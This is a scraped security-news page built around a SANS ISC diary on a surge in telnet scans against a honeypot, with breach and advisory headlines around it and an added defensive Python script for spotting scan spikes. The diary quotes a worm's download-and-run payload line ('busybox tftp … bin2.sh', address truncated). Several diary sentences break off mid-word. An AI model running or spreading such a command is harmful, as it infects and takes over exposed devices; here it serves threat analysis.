(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Softpedia News

Windows Zero-Day Affecting All OS Versions on Sale for $90000
A hacker going by the handle BuggiCorp is selling a zero-day vulnerability affecting all Windows OS versions that can allow an attacker to elevate privileges for software processes to the highest level available in Windows, known as SYSTEM. Security ...


(credit: CBS)

Less than two weeks after more than 177 million LinkedIn user passwords surfaced, security researchers have discovered three more breaches involving MySpace, Tumblr, and dating website Fling that all told bring the total number of compromised accounts to more than 642 million.

"Any one of these 4 I'm going to talk about on their own would be notable, but to see a cluster of them appear together is quite intriguing," security researcher Troy Hunt observed on Monday. The cluster involves breaches known to have happened to Fling in 2011, to LinkedIn in 2012, and to Tumblr in 2013. It's still not clear when the MySpace hack took place, but Hunt, operator of the Have I been pwned? breach notification service, said it surely happened sometime after 2007 and before 2012. He continued:

There are some really interesting patterns emerging here. One is obviously the age; the newest breach of this recent spate is still more than 3 years old. This data has been lying dormant (or at least out of public sight) for long periods of time.

The other is the size and these 4 breaches are all in the top 5 largest ones HIBP has ever seen. That's out of 109 breaches to date, too. Not only that, but these 4 incidents account for two thirds of all the data in the system, or at least they will once MySpace turns up.

Then there's the fact that it's all appearing within a very short period of time - all just this month. There's been some catalyst that has brought these breaches to light and to see them all fit this mould and appear in such a short period of time, I can't help but wonder if they're perhaps related.

All four of the password dumps are being sold on a darkweb forum by peace_of_mind, a user with 24 positive feedback ratings, two neutral ratings, and zero negative ratings. That's an indication the unknown person isn't exaggerating the quality of the data. The megabreach trend is troubling for at least a couple of reasons. First, it demonstrates that service providers are either unable to detect breaches or are willing to keep them secret for years after they're discovered. Second, it raises the unsettling question of where the trend will end, and whether additional breaches are in store before we get there.


FreeBSD Security Advisory FreeBSD-SA-16:22.libarchive
FreeBSD Security Advisory FreeBSD-SA-16:20.linux

Update: I extracted a sample pcap. The target IP (honeypot) is replaced with The odd thing about these connections is that they are not only all blind, but they don't really send a password. Also, according to my version of Wireshark, the telnet traffic is initially malformed. Maybe a telnet exploit? The pcap file is linked from the original diary.

Some readers noted that over the weekend, port 23 scans were up significantly. I just took a quick look at our honeypot, and don

Typically, a sharp increase in the number of source IPs indicates some type of worm that uses vulnerable systems to scan for more victims after it infects them.

The main target of telnet scans are usually

For the honeypot, I set up traffic capture collection (100MB) and extracted the telnet payloads with tshark (the display filter below is reconstructed; the operators were dropped when the original page was extracted):

    tshark -r telnet -n -Y "telnet.data && tcp.len > 1"

The payloads contain download-and-run commands of the form `busybox tftp -r bin2.sh -g 149…` (the server address is truncated in the original).

As you can see, they all follow the standard pattern. p0f can give us a quick breakdown of operating systems for the collected traffic. Pretty much all of the hits come from Linux. Out of the roughly 1 million p0f records, we got fewer than 200 that indicate an operating system other than Linux.
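As an added example (not part of the diary and not ISC's own tooling), the following Python script applies the two checks described above to constructed honeypot log lines: it counts distinct source IPs per day and flags a day whose count jumps well above the average of the preceding days, which is the "sharp increase in source IPs" signal of a self-propagating scanner, and it tallies a p0f-style OS label once per source. The log format, the addresses, the dates and the spike factor are all assumptions.

```python
"""Spot a sudden jump in distinct telnet scan sources in honeypot logs.

Added example; not ISC code. The log format is constructed: one line per
accepted TCP connection on port 23, as "<date> <src_ip> <p0f_os_label>".
"""
from collections import Counter, defaultdict
from datetime import date

# Constructed sample log (RFC 5737 documentation addresses, invented dates).
SAMPLE_LOG = """\
2016-05-27 198.51.100.10 Linux
2016-05-27 198.51.100.11 Linux
2016-05-27 198.51.100.10 Linux
2016-05-28 198.51.100.12 Linux
2016-05-28 203.0.113.5 Windows
2016-05-28 198.51.100.11 Linux
2016-05-29 198.51.100.20 Linux
2016-05-29 198.51.100.21 Linux
2016-05-29 198.51.100.22 Linux
2016-05-29 198.51.100.23 Linux
2016-05-29 198.51.100.24 Linux
2016-05-29 198.51.100.25 Linux
2016-05-29 198.51.100.26 Linux
2016-05-29 198.51.100.27 Linux
2016-05-29 198.51.100.27 Linux
"""


def parse_log(text):
    """Parse log lines into (date, source_ip, os_label) tuples, skipping blanks and comments."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        day, src, os_label = line.split(maxsplit=2)
        records.append((date.fromisoformat(day), src, os_label))
    return records


def unique_sources_per_day(records):
    """Count distinct source IPs per day (repeat connections from one IP count once)."""
    seen = defaultdict(set)
    for day, src, _ in records:
        seen[day].add(src)
    return {day: len(srcs) for day, srcs in sorted(seen.items())}


def flag_spikes(counts, factor=3.0):
    """Return the days whose distinct-source count exceeds `factor` times the
    mean of all earlier days. The first day has no baseline and is never flagged."""
    flagged, history = [], []
    for day, n in sorted(counts.items()):
        if history:
            baseline = sum(history) / len(history)
            if n > factor * baseline:
                flagged.append(day)
        history.append(n)
    return flagged


def os_breakdown(records):
    """p0f-style OS tally, counted once per distinct source IP (first label wins)."""
    per_source = {}
    for _, src, os_label in records:
        per_source.setdefault(src, os_label)
    return Counter(per_source.values())


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    counts = unique_sources_per_day(recs)
    for day, n in counts.items():
        print(f"{day}: {n} distinct sources")
    print("spike days:", [str(d) for d in flag_spikes(counts)])
    print("OS breakdown:", dict(os_breakdown(recs)))
```

On the sample data the third day shows eight distinct sources against a baseline of 2.5, so it is flagged, and the OS tally comes out almost entirely Linux, which is the pattern the diary describes for embedded devices scanning port 23. Against a real honeypot the same functions would be fed the source column of the tshark output and p0f's per-host labels.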

So in conclusion: Not sure what causes the significant increase, but I doubt that it is anything fundamentally different from what we have seen before. Keep your telnet servers contained (or turned off) and don't use default passwords.

Johannes B. Ullrich, Ph.D.

FreeBSD Security Advisory FreeBSD-SA-16:23.libarchive
FreeBSD Security Advisory FreeBSD-SA-16:21.43bsd

Softpedia News

Most Laptop Vendors Distribute Bloatware Full of Critical Security Bugs
What the Duo team discovered is that many laptop and notebook OEMs (Original Equipment Manufacturers) have hastily put together these programs, which at a closer look from trained infosec experts prove to be riddled with a large number of security ...
PC makers blasted for bad bloatware security (iT News)


New SANS Institute Incident Response Survey Finds Malware, Unauthorized Access And APTs Lead Attacks
SYS-CON Media (press release)
SANS offers a myriad of free resources to the InfoSec community including consensus projects, research reports, and newsletters; it also operates the Internet's early warning system--the Internet Storm Center. At the heart of SANS are the many security ...

[RT-SA-2016-004] Websockify: Remote Code Execution via Buffer Overflow
[RT-SA-2015-012] XML External Entity Expansion in Paessler PRTG Network Monitor
[RT-SA-2016-005] Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution
[slackware-security] mozilla-thunderbird (SSA:2016-152-02)
[slackware-security] imagemagick (SSA:2016-152-01)

iT News (blog)

Respect my Certificate Authority!
When infosec equipment vendor Blue Coat was issued an intermediate Certificate Authority (CA) signed by Symantec, not only did it create an uproar in the security industry, but it also (again) raised the question of why we're still using CAs. Blue Coat ...
